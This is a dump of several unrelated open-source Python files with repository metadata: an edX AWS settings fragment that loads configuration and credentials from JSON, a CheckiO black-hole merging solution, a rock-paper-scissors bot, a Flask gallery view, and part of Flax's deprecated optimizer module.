with open(CONFIG_ROOT / CONFIG_PREFIX + "auth.json") as auth_file:
AUTH_TOKENS = json.load(auth_file)
############### XBlock filesystem field config ##########
if 'DJFS' in AUTH_TOKENS and AUTH_TOKENS['DJFS'] is not None:
DJFS = AUTH_TOKENS['DJFS']
############### Module Store Items ##########
HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS = ENV_TOKENS.get('HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS', {})
############### Mixed Related(Secure/Not-Secure) Items ##########
# If Segment.io key specified, load it and enable Segment.io if the feature flag is set
SEGMENT_IO_LMS_KEY = AUTH_TOKENS.get('SEGMENT_IO_LMS_KEY')
if SEGMENT_IO_LMS_KEY:
FEATURES['SEGMENT_IO_LMS'] = ENV_TOKENS.get('SEGMENT_IO_LMS', False)
CC_PROCESSOR_NAME = AUTH_TOKENS.get('CC_PROCESSOR_NAME', CC_PROCESSOR_NAME)
CC_PROCESSOR = AUTH_TOKENS.get('CC_PROCESSOR', CC_PROCESSOR)
SECRET_KEY = AUTH_TOKENS['SECRET_KEY']
AWS_ACCESS_KEY_ID = AUTH_TOKENS["AWS_ACCESS_KEY_ID"]
if AWS_ACCESS_KEY_ID == "":
AWS_ACCESS_KEY_ID = None
AWS_SECRET_ACCESS_KEY = AUTH_TOKENS["AWS_SECRET_ACCESS_KEY"]
if AWS_SECRET_ACCESS_KEY == "":
AWS_SECRET_ACCESS_KEY = None
AWS_STORAGE_BUCKET_NAME = AUTH_TOKENS.get('AWS_STORAGE_BUCKET_NAME', 'edxuploads')
# Specific setting for the File Upload Service to store media in a bucket.
FILE_UPLOAD_STORAGE_BUCKET_NAME = ENV_TOKENS.get('FILE_UPLOAD_STORAGE_BUCKET_NAME', FILE_UPLOAD_STORAGE_BUCKET_NAME)
FILE_UPLOAD_STORAGE_PREFIX = ENV_TOKENS.get('FILE_UPLOAD_STORAGE_PREFIX', FILE_UPLOAD_STORAGE_PREFIX)
# If there is a database called 'read_replica', you can use the use_read_replica_if_available
# function in util/query.py, which is useful for very large database reads
DATABASES = AUTH_TOKENS['DATABASES']
XQUEUE_INTERFACE = AUTH_TOKENS['XQUEUE_INTERFACE']
# Get the MODULESTORE from auth.json, but if it doesn't exist,
# use the one from common.py
MODULESTORE = convert_module_store_setting_if_needed(AUTH_TOKENS.get('MODULESTORE', MODULESTORE))
CONTENTSTORE = AUTH_TOKENS.get('CONTENTSTORE', CONTENTSTORE)
DOC_STORE_CONFIG = AUTH_TOKENS.get('DOC_STORE_CONFIG', DOC_STORE_CONFIG)
MONGODB_LOG = AUTH_TOKENS.get('MONGODB_LOG', {})
OPEN_ENDED_GRADING_INTERFACE = AUTH_TOKENS.get('OPEN_ENDED_GRADING_INTERFACE',
OPEN_ENDED_GRADING_INTERFACE)
EMAIL_HOST_USER = AUTH_TOKENS.get('EMAIL_HOST_USER', '') # django default is ''
EMAIL_HOST_PASSWORD = AUTH_TOKENS.get('EMAIL_HOST_PASSWORD', '') # django default is ''
# Datadog for events!
DATADOG = AUTH_TOKENS.get("DATADOG", {})
DATADOG.update(ENV_TOKENS.get("DATADOG", {}))
# TODO: deprecated (compatibility with previous settings)
if 'DATADOG_API' in AUTH_TOKENS:
DATADOG['api_key'] = AUTH_TOKENS['DATADOG_API']
# Analytics dashboard server
ANALYTICS_SERVER_URL = ENV_TOKENS.get("ANALYTICS_SERVER_URL")
ANALYTICS_API_KEY = AUTH_TOKENS.get("ANALYTICS_API_KEY", "")
# Analytics data source
ANALYTICS_DATA_URL = ENV_TOKENS.get("ANALYTICS_DATA_URL", ANALYTICS_DATA_URL)
ANALYTICS_DATA_TOKEN = AUTH_TOKENS.get("ANALYTICS_DATA_TOKEN", ANALYTICS_DATA_TOKEN)
# Analytics Dashboard
ANALYTICS_DASHBOARD_URL = ENV_TOKENS.get("ANALYTICS_DASHBOARD_URL", ANALYTICS_DASHBOARD_URL)
ANALYTICS_DASHBOARD_NAME = ENV_TOKENS.get("ANALYTICS_DASHBOARD_NAME", PLATFORM_NAME + " Insights")
# Zendesk
ZENDESK_USER = AUTH_TOKENS.get("ZENDESK_USER")
ZENDESK_API_KEY = AUTH_TOKENS.get("ZENDESK_API_KEY")
# API Key for inbound requests from Notifier service
EDX_API_KEY = AUTH_TOKENS.get("EDX_API_KEY")
# Celery Broker
CELERY_BROKER_TRANSPORT = ENV_TOKENS.get("CELERY_BROKER_TRANSPORT", "")
CELERY_BROKER_HOSTNAME = ENV_TOKENS.get("CELERY_BROKER_HOSTNAME", "")
CELERY_BROKER_VHOST = ENV_TOKENS.get("CELERY_BROKER_VHOST", "")
CELERY_BROKER_USER = AUTH_TOKENS.get("CELERY_BROKER_USER", "")
CELERY_BROKER_PASSWORD = AUTH_TOKENS.get("CELERY_BROKER_PASSWORD", "")
BROKER_URL = "{0}://{1}:{2}@{3}/{4}".format(CELERY_BROKER_TRANSPORT,
CELERY_BROKER_USER,
CELERY_BROKER_PASSWORD,
CELERY_BROKER_HOSTNAME,
CELERY_BROKER_VHOST)
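# For example (hypothetical values), the settings above might combine into:
#   "amqp://celery_user:celery_pass@broker.internal.example.com/edxapp"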
# upload limits
STUDENT_FILEUPLOAD_MAX_SIZE = ENV_TOKENS.get("STUDENT_FILEUPLOAD_MAX_SIZE", STUDENT_FILEUPLOAD_MAX_SIZE)
# Event tracking
TRACKING_BACKENDS.update(AUTH_TOKENS.get("TRACKING_BACKENDS", {}))
EVENT_TRACKING_BACKENDS.update(AUTH_TOKENS.get("EVENT_TRACKING_BACKENDS", {}))
TRACKING_SEGMENTIO_WEBHOOK_SECRET = AUTH_TOKENS.get(
"TRACKING_SEGMENTIO_WEBHOOK_SECRET",
TRACKING_SEGMENTIO_WEBHOOK_SECRET
)
TRACKING_SEGMENTIO_ALLOWED_TYPES = ENV_TOKENS.get("TRACKING_SEGMENTIO_ALLOWED_TYPES", TRACKING_SEGMENTIO_ALLOWED_TYPES)
TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES = ENV_TOKENS.get(
"TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES",
TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES
)
TRACKING_SEGMENTIO_SOURCE_MAP = ENV_TOKENS.get("TRACKING_SEGMENTIO_SOURCE_MAP", TRACKING_SEGMENTIO_SOURCE_MAP)
# Student identity verification settings
VERIFY_STUDENT = AUTH_TOKENS.get("VERIFY_STUDENT", VERIFY_STUDENT)
# Grades download
GRADES_DOWNLOAD_ROUTING_KEY = HIGH_MEM_QUEUE
GRADES_DOWNLOAD = ENV_TOKENS.get("GRADES_DOWNLOAD", GRADES_DOWNLOAD)
##### ORA2 ######
# Prefix for uploads of example-based assessment AI classifiers
# This can be used to separate uploads for different environments
# within the same S3 bucket.
ORA2_FILE_PREFIX = ENV_TOKENS.get("ORA2_FILE_PREFIX", ORA2_FILE_PREFIX)
##### ACCOUNT LOCKOUT DEFAULT PARAMETERS #####
MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED = ENV_TOKENS.get("MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED", 5)
MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS = ENV_TOKENS.get("MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS", 15 * 60)
MICROSITE_CONFIGURATION = ENV_TOKENS.get('MICROSITE_CONFIGURATION', {})
MICROSITE_ROOT_DIR = path(ENV_TOKENS.get('MICROSITE_ROOT_DIR', ''))
#### PASSWORD POLICY SETTINGS #####
PASSWORD_MIN_LENGTH = ENV_TOKENS.get("PASSWORD_MIN_LENGTH")
PASSWORD_MAX_LENGTH = ENV_TOKENS.get("PASSWORD_MAX_LENGTH")
PASSWORD_COMPLEXITY = ENV_TOKENS.get("PASSWORD_COMPLEXITY", {})
PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD = ENV_TOKENS.get("PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD")
PASSWORD_DICTIONARY = ENV_TOKENS.get("PASSWORD_DICTIONARY", [])
### INACTIVITY SETTINGS ####
SESSION_INACTIVITY_TIMEOUT_IN_SECONDS = AUTH_TOKENS.get("SESSION_INACTIVITY_TIMEOUT_IN_SECONDS")
##### LMS DEADLINE DISPLAY TIME_ZONE #######
TIME_ZONE_DISPLAYED_FOR_DEADLINES = ENV_TOKENS.get("TIME_ZONE_DISPLAYED_FOR_DEADLINES",
TIME_ZONE_DISPLAYED_FOR_DEADLINES)
##### X-Frame-Options response header settings #####
X_FRAME_OPTIONS = ENV_TOKENS.get('X_FRAME_OPTIONS', X_FRAME_OPTIONS)
##### Third-party auth options ################################################
THIRD_PARTY_AUTH = AUTH_TOKENS.get('THIRD_PARTY_AUTH', THIRD_PARTY_AUTH)
##### OAUTH2 Provider ##############
if FEATURES.get('ENABLE_OAUTH2_PROVIDER'):
OAUTH_OIDC_ISSUER = ENV_TOKENS['OAUTH_OIDC_ISSUER']
OAUTH_ENFORCE_SECURE = ENV_TOKENS.get('OAUTH_ENFORCE_SECURE', True)
OAUTH_ENFORCE_CLIENT_SECURE = ENV_TOKENS.get('OAUTH_ENFORCE_CLIENT_SECURE', True)
##### ADVANCED_SECURITY_CONFIG #####
ADVANCED_SECURITY_CONFIG = ENV_TOKENS.get('ADVANCED_SECURITY_CONFIG', {})
##### GOOGLE ANALYTICS IDS #####
GOOGLE_ANALYTICS_ACCOUNT = AUTH_TOKENS.get('GOOGLE_ANALYTICS_ACCOUNT')
GOOGLE_ANALYTICS_LINKEDIN = AUTH_TOKENS.get('GOOGLE_ANALYTICS_LINKEDIN')
##### OPTIMIZELY PROJECT ID #####
OPTIMIZELY_PROJECT_ID = AUTH_TOKENS.get('OPTIMIZELY_PROJECT_ID', OPTIMIZELY_PROJECT_ID)
#### Course Registration Code length ####
REGISTRATION_CODE_LENGTH = ENV_TOKENS.get('REGISTRATION_CODE_LENGTH', 8)
# REGISTRATION CODES DISPLAY INFORMATION
INVOICE_CORP_ADDRESS = ENV_TOKENS.get('INVOICE_CORP_ADDRESS', INVOICE_CORP_ADDRESS)
INVOICE_PAYMENT_INSTRUCTIONS = ENV_TOKENS.get('INVOICE_PAYMENT_INSTRUCTIONS', INVOICE_PAYMENT_INSTRUCTIONS)
# Which access.py permission names to check;
# We default this to the legacy permission 'see_exists'.
COURSE_CATALOG_VISIBILITY_PERMISSION = ENV_TOKENS.get(
'COURSE_CATALOG_VISIBILITY_PERMISSION',
COURSE_CATALOG_VISIBILITY_PERMISSION
)
COURSE_ABOUT_VISIBILITY_PERMISSION = ENV_TOKENS.get(
'COURSE_ABOUT_VISIBILITY_PERMISSION',
COURSE_ABOUT_VISIBILITY_PERMISSION
)
# Date format the API will use when formatting datetime values
API_DATE_FORMAT = '%Y-%m-%d'
API_DATE_FORMAT = ENV_TOKENS.get('API_DATE_FORMAT', API_DATE_FORMAT)
# Enrollment API Cache Timeout
ENROLLMENT_COURSE_DETAILS_CACHE_TIMEOUT = ENV_TOKENS.get('ENROLLMENT_COURSE_DETAILS_CACHE_TIMEOUT', 60)
# PDF RECEIPT/INVOICE OVERRIDES
PDF_RECEIPT_TAX_ID = ENV_TOKENS.get('PDF_RECEIPT_TAX_ID', PDF_RECEIPT_TAX_ID)
PDF_RECEIPT_FOOTER_TEXT = ENV_TOKENS.get('PDF_RECEIPT_FOOTER_TEXT', PDF_RECEIPT_FOOTER_TEXT)
PDF_RECEIPT_DISCLAIMER_TEXT = ENV_TOKENS.get('PDF_RECEIPT_DISCLAIMER_TEXT', PDF_RECEIPT_DISCLAIMER_TEXT)
PDF_RECEIPT_BILLING_ADDRESS = ENV_TOKENS.get('PDF_RECEIPT_BILLING_ADDRESS', PDF_RECEIPT_BILLING_ADDRESS)
PDF_RECEIPT_TERMS_AND_CONDITIONS = ENV_TOKENS.get('PDF_RECEIPT_TERMS_AND_CONDITIONS', PDF_RECEIPT_TERMS_AND_CONDITIONS)
PDF_RECEIPT_TAX_ID_LABEL = ENV_TOKENS.get('PDF_RECEIPT_TAX_ID_LABEL', PDF_RECEIPT_TAX_ID_LABEL)
PDF_RECEIPT_LOGO_PATH = ENV_TOKENS.get('PDF_RECEIPT_LOGO_PATH', PDF_RECEIPT_LOGO_PATH)
PDF_RECEIPT_COBRAND_LOGO_PATH = ENV_TOKENS.get('PDF_RECEIPT_COBRAND_LOGO_PATH', PDF_RECEIPT_COBRAND_LOGO_PATH)
PDF_RECEIPT_LOGO_HEIGHT_MM = ENV_TOKENS.get('PDF_RECEIPT_LOGO_HEIGHT_MM', PDF_RECEIPT_LOGO_HEIGHT_MM)
PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM = ENV_TOKENS.get(
'PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM', PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM
)
if FEATURES.get('ENABLE_COURSEWARE_SEARCH') or FEATURES.get('ENABLE_DASHBOARD_SEARCH'):
# Use ElasticSearch as the search engine herein
SEARCH_ENGINE = "search.elastic.ElasticSearchEngine"
# Facebook app
FACEBOOK_API_VERSION = AUTH_TOKENS.get("FACEBOOK_API_VERSION")
FACEBOOK_APP_SECRET = AUTH_TOKENS.get("FACEBOOK_APP_SECRET")
FACEBOOK_APP_ID = AUTH_TOKENS.get("FACEBOOK_APP_ID")
XBLOCK_SETTINGS = ENV_TOKENS.get('XBLOCK_SETTINGS', {})
##### CDN EXPERIMENT/MONITORING FLAGS #####
CDN_VIDEO_URLS = ENV_TOKENS.get('CDN_VIDEO_URLS', CDN_VIDEO_URLS)
ONLOAD_BEACON_SAMPLE_RATE = ENV_TOKENS.get('ONLOAD_BEACON_SAMPLE_RATE', ONLOAD_BEACON_SAMPLE_RATE)
##### ECOMMERCE API CONFIGURATION SETTINGS #####
ECOMMERCE_API_URL = ENV_TOKENS.get('ECOMMERCE_API_URL', ECOMMERCE_API_URL)
ECOMMERCE_API_SIGNING_KEY = AUTH_TOKENS.get('ECOMMERCE_API_SIGNING_KEY', ECOMMERCE_API_SIGNING_KEY)
ECOMMERCE_API_TIMEOUT = ENV_TOKENS.get('ECOMMERCE_API_TIMEOUT', ECOMMERCE_API_TIMEOUT)
##### Custom Courses for EdX #####
if FEATURES.get('CUSTOM_COURSES_EDX'):
INSTALLED_APPS += ('ccx',)
MIDDLEWARE_CLASSES += ('ccx.overrides.CcxMiddleware',)
FIELD_OVERRIDE_PROVIDERS += (
'ccx.overrides.CustomCoursesForEdxOverrideProvider',
)
##### Individual Due Date Extensions #####
if FEATURES.get('INDIVIDUAL_DUE_DATES'):
FIELD_OVERRIDE_PROVIDERS += (
'courseware.student_field_overrides.IndividualStudentOverrideProvider',
)
# PROFILE IMAGE CONFIG
PROFILE_IMAGE_BACKEND = ENV_TOKENS.get('PROFILE_IMAGE_BACKEND', PROFILE_IMAGE_BACKEND)
PROFILE_IMAGE_SECRET_KEY = AUTH_TOKENS.get('PROFILE_IMAGE_SECRET_KEY', PROFILE_IMAGE_SECRET_KEY)
PROFILE_IMAGE_MAX_BYTES = ENV_TOKENS.get('PROFILE_IMAGE_MAX_BYTES', PROFILE_IMAGE_MAX_BYTES)
PROFILE_IMAGE_MIN_BYTES = ENV_TOKENS.get('PROFILE_IMAGE_MIN_BYTES', PROFILE_IMAGE_MIN_BYTES)
if FEATURES['IS_EDX_DOMAIN']:
PROFILE_IMAGE_DEFAULT_FILENAME = 'images/edx-theme/default-profile'
else:
PROFILE_IMAGE_DEFAULT_FILENAME = ENV_TOKENS.get('PROFILE_IMAGE_DEFAULT_FILENAME', PROFILE_IMAGE_DEFAULT_FILENAME)
AUTHENTICATION_BACKENDS = (
'social.backends.defy.DefyVenturesOAuth2Backend',
)
|
DefyVentures/edx-platform
|
lms/envs/aws.py
|
Python
|
agpl-3.0
| 27,732
|
from itertools import combinations
from math import pi, acos, hypot
def dist(a, b):
return hypot(a[0]-b[0], a[1]-b[1])
def area(r):
return pi*r**2
def checkio(data):
blackHoles = [list(bh) for bh in data]
    while True:
for bh in sorted(combinations(blackHoles, 2), key=lambda c: dist(*c)):
d = dist(*bh)
skinny, fatty = sorted(bh, key=lambda B: B[2])
r, R = skinny[2], fatty[2]
s1, s2 = map(area, [r, R])
if d+r < R:
# skinny is inside fatty
i = s1
elif d < R+r < R+R:
# the blackholes intersect
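                # Standard lens-area formula for two intersecting circles:
                # r^2*acos((d^2+r^2-R^2)/(2dr)) + R^2*acos((d^2+R^2-r^2)/(2dR))
                #   - sqrt((-d+r+R)(d+r-R)(d-r+R)(d+r+R))/2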
i = r**2*acos((d**2+r**2-R**2)/2/d/r) + \
R**2*acos((d**2-r**2+R**2)/2/d/R) - \
((-d+r+R)*(d+r-R)*(d-r+R)*(d+r+R))**.5/2
else:
# no intersection
i = 0
if i/s1 >= .55 and s2/s1 >= 1.2:
fatty[2] = ((s2+s1)/pi)**.5
blackHoles.remove(skinny)
break
else:
return blackHoles
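# A usage sketch (hypothetical data): the smaller hole is internally tangent
# to the larger (d + r == R), so 100% of it is covered while the larger has
# 4x its area; the two merge into one hole of combined area 20*pi:
#   checkio([(10, 10, 4), (12, 10, 2)])  # -> [[10, 10, 4.4721...]]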
|
Pouf/CodingCompetition
|
CiO/black-holes.py
|
Python
|
mit
| 1,087
|
#!/usr/bin/env python
import sys
for _ in range(101):
print "P\n."
sys.stdout.flush()
|
ethercrow/ai-challenger
|
game-rps/paper.py
|
Python
|
mit
| 95
|
from flask import render_template
from ..models import picture_list
def gallery():
    return render_template('gallery.html', active_page='gallery', pictures=picture_list)
|
PhoenixRacing/PhoenixRacingWebApp-noregrets
|
application/controllers/gallery.py
|
Python
|
bsd-3-clause
| 218
|
# Copyright 2022 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Flax Optimizer api."""
import dataclasses
from typing import Any, List, Tuple
import warnings
from .. import jax_utils
from .. import serialization
from .. import struct
from .. import traverse_util
import jax
import jax.numpy as jnp
from ..core import FrozenDict, unfreeze
# Backwards compatibility symbol import.
ModelParamTraversal = traverse_util.ModelParamTraversal
@struct.dataclass
class OptimizerState:
step: jnp.ndarray
param_states: Any
class OptimizerDef:
"""Base class for an optimizer defintion, which specifies the initialization and gradient application logic.
See docstring of :class:`Optimizer` for more details.
"""
def __init__(self, hyper_params):
self.hyper_params = hyper_params
warnings.warn(
'Use `optax` instead of `flax.optim`. Refer to the update guide '
'https://flax.readthedocs.io/en/latest/howtos/optax_update_guide.html '
'for detailed instructions.', DeprecationWarning)
def apply_param_gradient(self, step, hyper_params, param, state, grad):
"""Apply a gradient for a single parameter.
Args:
step: the current step of the optimizer.
hyper_params: a named tuple of hyper parameters.
param: the parameter that should be updated.
state: a named tuple containing the state for this parameter
grad: the gradient tensor for the parameter.
Returns:
A tuple containing the new parameter and the new state.
"""
raise NotImplementedError()
def init_param_state(self, param):
"""Initializes the state for a parameter.
Args:
param: the parameter for which to initialize the state.
Returns:
A named tuple containing the initial optimization state for the parameter.
"""
raise NotImplementedError()
def apply_gradient(self, hyper_params, params, state, grads):
"""Applies a gradient for a set of parameters.
Args:
hyper_params: a named tuple of hyper parameters.
params: the parameters that should be updated.
state: a named tuple containing the state of the optimizer
grads: the gradient tensors for the parameters.
Returns:
A tuple containing the new parameters and the new optimizer state.
"""
step = state.step
params_flat, treedef = jax.tree_flatten(params)
states_flat = treedef.flatten_up_to(state.param_states)
grads_flat = treedef.flatten_up_to(grads)
out = [self.apply_param_gradient(step, hyper_params, param, state, grad)
for param, state, grad in zip(params_flat, states_flat, grads_flat)]
new_params_flat, new_states_flat = list(zip(*out)) if out else ((), ())
new_params = jax.tree_unflatten(treedef, new_params_flat)
new_param_states = jax.tree_unflatten(treedef, new_states_flat)
new_state = OptimizerState(step + 1, new_param_states)
return new_params, new_state
def init_state(self, params):
param_states = jax.tree_map(self.init_param_state, params)
state = OptimizerState(jnp.asarray(0, dtype=jnp.int32), param_states)
return state
def update_hyper_params(self, **hyper_param_overrides):
"""Updates the hyper parameters with a set of overrides.
This method is called from Optimizer apply_gradient to create the
hyper parameters for a specific optimization step.
Args:
**hyper_param_overrides: the hyper parameters updates
will override the defaults specified in the `OptimizerDef`.
Pass `hyper_params=...` to replace all hyper parameters.
Returns:
The new hyper parameters.
"""
hp = hyper_param_overrides.pop('hyper_params', self.hyper_params)
if hyper_param_overrides:
hp = hp.replace(**hyper_param_overrides)
return hp
def create(self, target, focus: 'ModelParamTraversal' = None):
"""Creates a new optimizer for the given target.
See docstring of :class:`Optimizer` for more details.
Args:
target: the object to be optimized. This is typically a variable dict
returned by `flax.linen.Module.init()`, but it can also be a container
        of variables dicts, e.g. `(v1, v2)` and `{'var1': v1, 'var2': v2}`
are valid inputs as well.
focus: a `flax.traverse_util.Traversal` that selects which subset of
the target is optimized. See docstring of :class:`MultiOptimizer`
for an example of how to define a `Traversal` object.
Returns:
An instance of `Optimizer`.
"""
opt_def = self
if focus:
opt_def = MultiOptimizer((focus, opt_def))
state = opt_def.init_state(target)
return Optimizer(opt_def, state, target)
def state_dict(self, target, state):
return serialization.to_state_dict({
'target': serialization.to_state_dict(target),
'state': serialization.to_state_dict(state)
})
def restore_state(self, opt_target, opt_state, state_dict):
"""Restore the optimizer target and state from the state dict.
This function accepts the current optimizer target and state. This
lets us know the exact structure of the optimizer target and state,
as well as lets us add assertions that shapes and dtypes don't change.
In practice, no values in `opt_target` and `opt_state` are actually
    used; only the tree structure, shapes and types are.
Args:
opt_target: the optimizer target.
opt_state: the optimizer state.
state_dict: the state dict containing the desired new state of the
optimizer.
Returns:
a tuple of the optimizer target and state with the restored values from
the state dict.
"""
opt_target = serialization.from_state_dict(opt_target, state_dict['target'])
opt_state = serialization.from_state_dict(opt_state, state_dict['state'])
return opt_target, opt_state
class _NoAux:
"""Placeholder used to indicate a lack of auxilairy outputs."""
pass
class Optimizer(struct.PyTreeNode):
"""
Flax optimizers are created using the :class:`OptimizerDef` class. That class
specifies the initialization and gradient application logic. Creating an
optimizer using the :meth:`OptimizerDef.create` method will result in an
instance of the :class:`Optimizer` class, which encapsulates the optimization
target and state. The optimizer is updated using the method
:meth:`apply_gradient`.
Example of constructing an optimizer for a model::
from flax import optim
optimizer_def = optim.GradientDescent(learning_rate=0.1)
optimizer = optimizer_def.create(model)
The optimizer is then used in a training step as follows::
def train_step(optimizer, data):
def loss_fn(model):
y = model(data)
loss = ... # compute the loss
aux = ... # compute auxiliary outputs (eg. training metrics)
return loss, aux
grad_fn = jax.value_and_grad(loss_fn, has_aux=True)
(loss, aux), grad = grad_fn(optimizer.target)
new_optimizer = optimizer.apply_gradient(grad)
return new_optimizer, loss, aux
Distributed training only requires a few extra additions::
from flax import optim
optimizer_def = optim.GradientDescent(learning_rate=0.1)
optimizer = optimizer_def.create(model)
optimizer = jax_utils.replicate(optimizer)
def train_step(optimizer, data):
def loss_fn(model):
y = model(data)
loss = ... # compute the loss
aux = ... # compute auxiliary outputs (eg. training metrics)
return loss, aux
grad_fn = jax.value_and_grad(loss_fn, has_aux=True)
(loss, aux), grad = grad_fn(optimizer.target)
grad = jax.lax.pmean(grad, 'batch')
new_optimizer = optimizer.apply_gradient(grad)
return new_optimizer, loss, aux
distributed_train_step = jax.pmap(train_step, axis_name='batch')
Attributes:
optimizer_def: The optimizer definition.
state: The initial state of the optimizer.
    target: The target to optimize."""
optimizer_def: OptimizerDef = struct.field(pytree_node=False)
state: Any = struct.field(pytree_node=True)
target: Any = struct.field(pytree_node=True)
def apply_gradient(self, grads, **hyper_param_overrides):
"""Applies a pytree of gradients to the target.
Args:
grads: A pytree of gradients.
**hyper_param_overrides: the hyper parameters passed to apply_gradient
will override the defaults specified in the `OptimizerDef`.
Pass `hyper_params=...` to replace all hyper parameters.
Returns:
A new optimizer with the updated target and state.
"""
hyper_params = self.optimizer_def.update_hyper_params(
**hyper_param_overrides)
new_target, new_state = self.optimizer_def.apply_gradient(
hyper_params, self.target, self.state, grads)
return self.replace(target=new_target, state=new_state)
def compute_gradient(self, loss_fn):
"""Computes gradient of loss_fn.
DEPRECATION WARNING:
compute_gradient() is deprecated.
Use jax.grad() or jax.value_and_grad() instead.
Args:
loss_fn: a function that receives the target and returns a loss or a
tuple of the loss and auxiliary outputs.
Returns:
A tuple consisting of the loss, auxiliary outputs if any,
and a list of gradient.
"""
    warnings.warn('compute_gradient() will be removed soon. '
                  'Use jax.grad() or jax.value_and_grad() instead.',
                  DeprecationWarning)
def loss_wrapper(target):
loss_and_aux = loss_fn(target)
if isinstance(loss_and_aux, jnp.ndarray):
return loss_and_aux, _NoAux
else:
return loss_and_aux
grad_fn = jax.value_and_grad(loss_wrapper, has_aux=True)
(loss, aux), grad = grad_fn(self.target)
if aux is _NoAux:
return loss, grad
else:
return loss, aux, grad
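  # Alias kept for the plural spelling (presumably for backwards compatibility).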
compute_gradients = compute_gradient
def optimize(self, loss_fn, **hyper_param_overrides):
"""Optimizes the target with respect to a loss function.
DEPRECATION WARNING:
optimize() is deprecated.
Use jax.grad() or jax.value_and_grad() and apply_gradient() instead.
Args:
loss_fn: function that receives the target and returns a loss or a
tuple of the loss and auxiliary outputs.
**hyper_param_overrides: the hyper parameters passed to apply_gradient
will override the defaults specified in the `OptimizerDef`.
Pass `hyper_params=...` to replace all hyper parameters.
Returns:
A tuple consisting of the new optimizer, the loss,
and the auxiliary outputs if any.
"""
    warnings.warn('optimize() will be removed soon. '
                  'Use jax.grad() or jax.value_and_grad() '
                  'and apply_gradient() instead.',
                  DeprecationWarning)
output_and_grad = self.compute_gradient(loss_fn)
grad = output_and_grad[-1]
optimizer = self.apply_gradient(grad, **hyper_param_overrides)
return (optimizer,) + output_and_grad[:-1]
def replicate(self, devices=None, axis_name='batch'):
"""Replicates an optimizer for data parallel training.
A replicated optimizer will automatically average the gradients across
devices. For this to work correctly the optimize method should be called
within the context of a `jax.pmap` call with the correct axis_name.
DEPRECATION WARNING:
replicate() is deprecated.
Use jax_utils.replicate() instead.
Args:
devices: an optional list of devices defining which devices this optimizer
is replicated to (default: all local devices).
axis_name: the axis_name used for gradient averaging across devices.
Returns:
The replicated optimizer.
"""
if devices is None:
devices = jax.local_devices()
optimizer_def = ReplicatedOptimizer(self.optimizer_def, devices, axis_name)
optimizer = jax_utils.replicate(self, devices=devices)
return optimizer.replace(optimizer_def=optimizer_def)
def unreplicate(self):
"""Un-replicates an optimizer.
This will create a new optimizer with the target and state of the first
device this optimizer was replicated to. After this call the optimizer
and the target can be used outside of a `jax.pmap` call.
DEPRECATION WARNING:
unreplicate() is deprecated.
Use jax_utils.unreplicate() instead.
Returns:
The optimizer that is no longer replicated.
"""
if not isinstance(self.optimizer_def, ReplicatedOptimizer):
raise ValueError('Cannot unreplicate an optimizer '
'that is not replicated.')
optimizer_def = self.optimizer_def.optimizer_def
optimizer = jax_utils.unreplicate(self)
return optimizer.replace(optimizer_def=optimizer_def)
def state_dict(self):
return self.optimizer_def.state_dict(self.target, self.state)
def restore_state(self, state):
target, state = self.optimizer_def.restore_state(
self.target, self.state, state)
return self.replace(target=target, state=state)
# Optimizer serialization is handled by the state_dict and restore_state methods
# of the OptimizerDef. Currently, this is used to store only a single copy of
# a replicated optimizer.
serialization.register_serialization_state(
Optimizer, Optimizer.state_dict, Optimizer.restore_state,
override=True)
class ReplicatedOptimizer(OptimizerDef):
"""Data parallel optimizer.
DEPRECATION WARNING:
ReplicatedOptimizer will be removed soon.
Use `jax_utils.replicate(optimizer)` and `lax.pmean(grad)` to explicitly
  control the replication of the optimizer and the cross replica averaging
over gradients, respectively.
"""
def __init__(self, optimizer_def, devices=None, axis_name='batch'):
super().__init__(optimizer_def.hyper_params)
if devices is None:
devices = jax.local_devices()
self.optimizer_def = optimizer_def
self.devices = devices
self.axis_name = axis_name
def init_state(self, params):
return self.optimizer_def.init_state(params)
def _cross_replica_mean(self, grad):
axis_size = jax.lax.psum(1, axis_name=self.axis_name)
return jax.lax.psum(grad, axis_name=self.axis_name) / axis_size
def apply_gradient(self, hyper_params, params, state, grads):
grads = jax.tree_map(self._cross_replica_mean, grads)
return self.optimizer_def.apply_gradient(hyper_params, params, state, grads)
def update_hyper_params(self, **hyper_param_overrides):
return self.optimizer_def.update_hyper_params(**hyper_param_overrides)
def state_dict(self, target, state):
state_dict = self.optimizer_def.state_dict(target, state)
# only the first copy of the parameters and optimizer state are stored.
state_dict = jax.tree_map(lambda x: x[0], state_dict)
return state_dict
def restore_state(self, target, opt_state, state_dict):
# replicate the parameters and state to all devices.
state_dict = jax_utils.replicate(state_dict, devices=self.devices)
return self.optimizer_def.restore_state(target, opt_state, state_dict)
@dataclasses.dataclass
class _ShapeDtype:
shape: Any
dtype: Any
_value: Any
_indices: List[int]
@classmethod
def create(cls, value):
if not isinstance(value, jnp.ndarray):
value = jnp.array(value)
return cls(shape=value.shape, dtype=value.dtype, _value=value, _indices=[])
class MultiOptimizer(OptimizerDef):
"""
  A MultiOptimizer is a subclass of :class:`OptimizerDef` and is useful for applying
separate optimizer algorithms to various subsets of the model parameters.
The example below creates two optimizers using
:class:`flax.traverse_util.ModelParamTraversal`:
  one to optimize ``kernel`` parameters and one to optimize ``bias`` parameters.
Note each optimizer is created with a different learning rate::
kernels = traverse_util.ModelParamTraversal(lambda path, _: 'kernel' in path)
biases = traverse_util.ModelParamTraversal(lambda path, _: 'bias' in path)
kernel_opt = optim.Momentum(learning_rate=0.01)
